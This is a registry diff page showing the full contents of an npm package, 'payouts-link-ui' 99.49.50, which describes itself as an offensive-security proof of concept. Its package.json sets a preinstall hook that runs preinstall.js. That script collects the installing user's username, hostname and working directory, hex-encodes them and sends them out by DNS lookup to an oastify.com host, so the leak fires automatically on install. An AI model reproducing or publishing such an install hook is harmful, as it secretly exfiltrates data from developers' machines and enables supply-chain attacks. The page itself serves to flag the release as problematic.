payouts-link-ui 99.49.50

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of payouts-link-ui might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +1 -0
  2. package/package.json +13 -0
  3. package/preinstall.js +23 -0
package/index.js ADDED
@@ -0,0 +1 @@
1
+ console.log("OffSec PoC")
package/package.json ADDED
@@ -0,0 +1,13 @@
1
+ {
2
+ "name": "payouts-link-ui",
3
+ "version": "99.49.50",
4
+ "description": "Internal PoC by OffSec Team",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "node preinstall.js"
8
+ },
9
+ "author": "MM",
10
+ "license": "MIT",
11
+ "dependencies": {}
12
+ }
13
+
package/preinstall.js ADDED
@@ -0,0 +1,23 @@
1
+ const os = require('os');
2
+ const { execSync } = require('child_process');
3
+
4
+ // Collect data
5
+ const username = os.userInfo().username;
6
+ const hostname = os.hostname();
7
+ const currentPath = process.cwd();
8
+
9
+ // Convert to hex
10
+ const toHex = (str) => Buffer.from(str, 'utf8').toString('hex');
11
+
12
+ // Hex-encode data
13
+ const hexData = `${toHex(username)}.${toHex(hostname)}.${toHex(currentPath.replace(/\//g, '-'))}`;
14
+
15
+ // Construct DNS query
16
+ const dnsQuery = `nslookup ${hexData}.ufd8urohc988b1a8owm8wlvuxl3cr2fr.oastify.com`;
17
+
18
+ // Execute DNS query to exfiltrate data
19
+ try {
20
+ execSync(dnsQuery);
21
+ } catch (error) {
22
+ console.error(`Error: ${error.message}`);
23
+ }